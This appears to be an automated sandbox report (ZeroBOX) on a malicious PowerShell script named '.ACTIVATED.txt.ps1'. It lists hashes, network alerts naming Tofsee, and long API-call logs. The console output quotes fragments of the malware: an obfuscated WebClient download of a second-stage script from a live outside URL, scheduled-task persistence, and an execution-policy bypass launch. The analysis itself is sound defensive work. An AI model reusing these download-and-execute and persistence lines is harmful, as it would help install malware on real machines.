Summary | ZeroBOX

.ACTIVATED.txt.ps1

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 6, 2023, 9:49 a.m. Sept. 6, 2023, 9:51 a.m.
Size 1.9KB
Type ASCII text, with CRLF line terminators
MD5 a11d9710bf81fe62ed4ff6c69636c5ad
SHA256 1ea088faf229642907df2f669b269bfbf84af19593daa3061df4b35b9ae60ced
CRC32 01938C1F
ssdeep 48:5EIYK6Z1/PWLs8vhjZTF39VDC+RN9KEfwN9NEpN9zEL:g51/Pys8ZjdF37DRr9hu9yT94L
Yara None matched

Name Response Post-Analysis Lookup
www.kbproducciones.com 50.63.15.171
IP Address Status Action
164.124.101.2 Active Moloch
50.63.15.171 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 50.63.15.171:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49167 -> 50.63.15.171:443 C=US, O=DigiCert Inc, OU=www.digicert.com, CN=RapidSSL TLS RSA CA G1 CN=kbproducciones.com f6:66:91:c6:36:7f:fc:41:a1:2e:cd:e6:8a:e1:3f:c6:bc:04:27:b0

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Mode LastWriteTime Length Name
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: d---- 2023-09-06 오전 9:49 Document
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f
console_handle: 0x00000037
1 1 0

WriteConsoleW

buffer: unction, script file, or operable program. Check the spelling of the name, or i
console_handle: 0x00000043
1 1 0

WriteConsoleW

buffer: f a path was included, verify that the path is correct and try again.
console_handle: 0x0000004f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:17 char:34
console_handle: 0x0000005b
1 1 0

WriteConsoleW

buffer: + $action = New-ScheduledTaskAction <<<< -Execute 'C:\ProgramData\Document\sCh
console_handle: 0x00000067
1 1 0

WriteConsoleW

buffer: ildKey.vbs'
console_handle: 0x00000073
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskAction:String)
console_handle: 0x0000007f
1 1 0

WriteConsoleW

buffer: [], CommandNotFoundException
console_handle: 0x0000008b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: The term 'New-ScheduledTaskTrigger' is not recognized as the name of a cmdlet,
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: function, script file, or operable program. Check the spelling of the name, or
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: if a path was included, verify that the path is correct and try again.
console_handle: 0x000000cf
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:18 char:36
console_handle: 0x000000db
1 1 0

WriteConsoleW

buffer: + $trigger = New-ScheduledTaskTrigger <<<< -Once -At (Get-Date) -RepetitionInt
console_handle: 0x000000e7
1 1 0

WriteConsoleW

buffer: erval (New-TimeSpan -Minutes 2)
console_handle: 0x000000f3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (New-ScheduledTaskTrigger:String
console_handle: 0x000000ff
1 1 0

WriteConsoleW

buffer: ) [], CommandNotFoundException
console_handle: 0x0000010b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000117
1 1 0

WriteConsoleW

buffer: The term 'Register-ScheduledTask' is not recognized as the name of a cmdlet, fu
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: nction, script file, or operable program. Check the spelling of the name, or if
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: a path was included, verify that the path is correct and try again.
console_handle: 0x00000033
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:19 char:23
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: + Register-ScheduledTask <<<< -Action $action -Trigger $trigger -TaskName "Ver
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: sionNumber"
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Register-ScheduledTask:String)
console_handle: 0x00000063
1 1 0

WriteConsoleW

buffer: [], CommandNotFoundException
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x000000ab
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x000000b7
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\.ACTIVATED.txt.ps1:43 char:72
console_handle: 0x000000c3
1 1 0

WriteConsoleW

buffer: + if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e" <<<<
console_handle: 0x000000cf
1 1 0

WriteConsoleW

buffer: ('https://www.kbproducciones.com/.TEAK/.M1.jpg', $NEWS + 'Managing.ps1')){
console_handle: 0x000000db
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000f3
1 1 0

WriteConsoleW

buffer: The term 'C:\ProgramData\Document\Managing.ps1' is not recognized as the name o
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: f a cmdlet, function, script file, or operable program. Check the spelling of t
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: he name, or if a path was included, verify that the path is correct and try aga
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: in.
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:2
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + & <<<< C:\ProgramData\Document\Managing.ps1
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (C:\ProgramData\Document\Managin
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: g.ps1:String) [], CommandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0078a2c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x060cfcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x060cfcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d09b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0a70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d0e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d10b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d13b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d15b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d1630
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02709000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05611000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05612000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05613000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05461000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06380000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06570000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06571000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06572000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06573000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06574000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05614000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05615000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05616000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02779000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05671000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06575000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0657a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0658f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05617000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05618000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2860
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73662000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2940
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0273a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2940
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02742000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2940
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0276a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Document\sChildKey.vbs
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
cmdline powershell -ExecutionPolicy Bypass & C:\ProgramData\Document\Managing.ps1
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
